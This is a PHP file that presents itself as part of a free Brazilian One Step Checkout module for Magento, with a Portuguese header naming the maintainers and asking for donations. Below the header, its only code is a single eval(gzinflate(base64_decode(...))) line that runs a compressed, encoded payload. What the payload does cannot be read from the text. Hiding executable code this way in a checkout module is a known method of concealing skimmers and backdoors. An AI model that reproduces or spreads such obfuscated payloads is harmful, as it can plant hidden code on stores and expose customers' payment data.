<?php
/*=========================================================================================================================================================
 *
 *  PROJETO OSC MAGENTO BRASIL - VERSÃO FINAL V4.0.1
 *  +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
 *  O módulo One Step Checkout normatizado para a localização brasileira.
 *  site do projeto: http://onestepcheckout.com.br/
 *  +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
 *
 *
 *
 *  Mmantenedores do Projeto:
 *  +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
 *
 *  Deivison Arthur Lemos Serpa
 *  deivison.arthur@gmail.com
 *  www.deivison.com.br
 *  (21)9203-8986
 *
 *  Denis Colli Spalenza
 *  http://www.xpdev.com.br
 *
 *  +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
 *
 *
 *
 *  GOSTOU DO MÓDULO?
 *  +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
 *  Se você gostou, se foi útil para você, se fez você economizar aquela grana pois estava prestes a pagar caro por aquele módulo pago, pois não achava uma
 *  solução gratuita que te atendesse e queira prestigiar o trabalho feito efetuando uma doação de qualquer valor, não vou negar e vou ficar grato! você
 *  pode fazer isso visitando a página do projeto em: http://onestepcheckout.com.br/
 *  +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
 *
/*=========================================================================================================================================================
 */
?>
<?php
eval(gzinflate(base64_decode('jZNPi9swEMXv+RSD6JIEmnj36vgPbFja0qaUTfewJyPLE0tEloQ03jbfvnJihy5l2fpgjDzvN/Pe2GUxyxr1AkLzEHLmeIsrUqSRFTOIVybviqx00gEKaeEDSRVWRVUt5ntpnVOmhS33BCrAQ+foNF9CWWRJVM2yJIJf40UsXeFQN+H/QbdIOwwhzhHutRXHxfJ89snb3mHzmTq9GFq8rd5KpS91cyFRHG1P1dC3OvetfqkmFs2XmyvEvWHw2fYg+QuCsaAIuwDKwMn2HsJkfeCuR8vuHdxWK3GEjIP0eMjZTWCFRI9ZwgsgC8IaUqbHK3w9//i3q/H1lPqTjzm8bvxOGFfueWjitcY1PxD6MYtxXaMJCHTSmLMYF8kU7m5vbzZA+JtWXKvWpCDQRC2DIqs9JP91v6D5hO64b1Uk8Z4sG1ORRC5NEmswELppf2thu3XtEwYUNUg5q2rNzZEVmeraiVdb36BP47oMbhgEL3KWlfkufkppGlX3POAQ23BQba3Hamcb1NWe4nOaPj1+q34+/3io9l+/fF+WxcHHyNE0SR11SYMH3mtKVDd8mcOAw68yDZjYIFa150Fpt3amZYPnuNiL42FDs6z8Aw==')));
?>